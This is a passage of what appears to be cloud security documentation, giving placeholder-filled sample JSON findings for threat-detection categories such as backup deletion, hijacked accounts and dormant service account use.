{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "updatePolicy", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR reduced backup frequency", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "The backup schedule has been modified to reduce backup frequency.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_reduce_backup_frequency" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "The backup schedule has been modified to reduce backup frequency.", } }
Impact: Google Cloud Backup and DR remove appliance
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deleteCluster", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "appliance": "APPLIANCE_NAME", "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR remove appliance", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A backup appliance was deleted from Google Cloud Backup and DR Service. Applications that are associated with the deleted backup appliance might not be protected.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "DATA_DESTRUCTION" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_appliances_remove_appliance" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1485/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A backup appliance was deleted from Google Cloud Backup and DR Service. Applications that are associated with the deleted backup appliance might not be protected.", "backupDisasterRecovery": { "appliance": "APPLIANCE_NAME" } } }
Inhibit System Recovery: Google Cloud Backup and DR remove plan
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deleteSla", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "applications": [ "HOST_NAME" ], "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Inhibit System Recovery: Google Cloud Backup and DR remove plan", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A backup plan with multiple policies for an application was deleted from the Google Cloud Backup and DR Service. The deletion of a backup plan can prevent future backups.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_remove_plan" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A backup plan with multiple policies for an application was deleted from the Google Cloud Backup and DR Service. The deletion of a backup plan can prevent future backups.", "backupDisasterRecovery": { "applications": [ "HOST_NAME" ] } } }
Initial Access: Account Disabled Hijacked
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Initial Access: Account Disabled Hijacked", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "valid_accounts", "indicator": "audit_log", "ruleName": "account_disabled_hijacked" }, "detectionPriority": "MEDIUM", "affectedResources": [{ "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1624034293", "nanos": 6.78E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "login.googleapis.com", "methodName": "google.login.LoginService.accountDisabledHijacked", "ssoState": "UNKNOWN", "principalEmail": "PRINCIPAL_EMAIL" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-18T16:38:13.678Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#account_disabled_hijacked" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-06-18T16:38:13.678Z", "createTime": "2021-06-18T16:38:16.508Z", "severity": "MEDIUM", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//login.googleapis.com/organizations/ORGANIZATION_ID" } }
Initial Access: Database Superuser Writes to User Tables
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "state": "ACTIVE", "category": "Initial Access: Database Superuser Writes to User Tables", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "cloudsql_superuser_writes_to_user_tables", }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME" } ], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1567/002/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }], "relatedFindingUri": { "displayName": "Related CloudSQL Exfiltration findings", "url": "RELATED_FINDINGS_LINK" } } }, "eventTime": "2022-01-19T21:36:07.901Z", "createTime": "2022-01-19T21:36:08.695Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": ["DEFAULT_ACCOUNTS"] }, "database": { "displayName": "DATABASE_NAME", "userName": "USER_NAME", "query": QUERY", }, "access": { "serviceName": "cloudsql.googleapis.com", "methodName": "cloudsql.instances.query" } }, "resource": { "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudsql.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.cloud.sql.Instance", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" }], "displayName": "INSTANCE_NAME" } }
Initial Access: Disabled Password Leak
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Initial Access: Disabled Password Leak", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "valid_accounts", "indicator": "audit_log", "ruleName": "disabled_password_leak" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1626462896", "nanos": 6.81E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "login.googleapis.com", "methodName": "google.login.LoginService.accountDisabledPasswordLeak", "ssoState": "UNKNOWN", "principalEmail": "PRINCIPAL_EMAIL" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-07-16T19:14:56.681Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#account_disabled_password_leak" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-07-16T19:14:56.681Z", "createTime": "2021-07-16T19:15:00.430Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT", "indicator": { } }, "resource": { "name": "//login.googleapis.com/organizations/ORGANIZATION_ID" } }
Initial Access: Dormant Service Account Action
{ "findings": { "access": { "principalEmail": "DORMANT_SERVICE_ACCOUNT", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Initial Access: Dormant Service Account Action", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-01-12T10:35:47.381Z", "database": {}, "eventTime": "2023-01-12T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "RESOURCE_NAME", "display_name": "RESOURCE_DISPLAY_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "parent_display_name": "FOLDER_NAME", "type": "RESOURCE_TYPE", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "dormant_sa_used_in_action", }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0003/" } } } }
Initial Access: Dormant Service Account Activity in AI Service
{ "findings": { "access": { "principalEmail": "DORMANT_SERVICE_ACCOUNT", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Initial Access: Dormant Service Account Activity in AI Service", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-01-12T10:35:47.381Z", "database": {}, "eventTime": "2023-01-12T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS" ] }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ai_dormant_sa_used_in_action", }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://atlas.mitre.org/techniques/AML.T0012/" } } } }
Initial Access: Dormant Service Account Key Created
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "iam.googleapis.com", "methodName": "google.iam.admin.v1.CreateServiceAccountKey" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Initial Access: Dormant Service Account Key Created", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-01-12T10:35:47.381Z", "database": {}, "eventTime": "2023-01-12T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID/keys/SERVICE_ACCOUNT_KEY_ID", "severity": "HIGH", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID/keys/SERVICE_ACCOUNT_KEY_ID", "display_name": "projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_EMAIL/keys/SERVICE_ACCOUNT_KEY_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID", "parent_display_name": "projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_EMAIL", "type": "google.iam.ServiceAccountKey", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "key_created_on_dormant_sa" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0003/" } } } }
Initial Access: Excessive Permission Denied Actions
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME", "principalSubject": "PRINCIPAL_SUBJECT", "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Initial Access: Excessive Permission Denied Actions", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-01-12T10:35:47.381Z", "database": {}, "eventTime": "2023-01-12T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "RESOURCE_NAME", "display_name": "RESOURCE_DISPLAY_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "parent_display_name": "FOLDER_NAME", "type": "RESOURCE_TYPE", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "anomalous_behavior", "subRuleName": "new_api_method" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": { "failedActions": [ { "methodName": "SetIamPolicy", "serviceName": "iam.googleapis.com", "attemptTimes": "7", "lastOccurredTime": "2023-03-15T17:35:18.771219Z" }, { "methodName": "iam.googleapis.com", "serviceName": "google.iam.admin.v1.CreateServiceAccountKey", "attemptTimes": "3", "lastOccurredTime": "2023-03-15T05:36:14.954701Z" } ] }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" } } } }
Initial Access: Government Based Attack
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Initial Access: Government Based Attack", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "valid_accounts", "indicator": "audit_log", "ruleName": "government_based_attack" }, "detectionPriority": "HIGH", "affectedResources": [{ "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1624061458", "nanos": 7.4E7 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "login.googleapis.com", "methodName": "google.login.LoginService.govAttackWarning", "ssoState": "UNKNOWN", "principalEmail": "PRINCIPAL_EMAIL" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-19T00:10:58.074Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }], "workspacesUri": { "displayName": "Workspaces Link", "url": 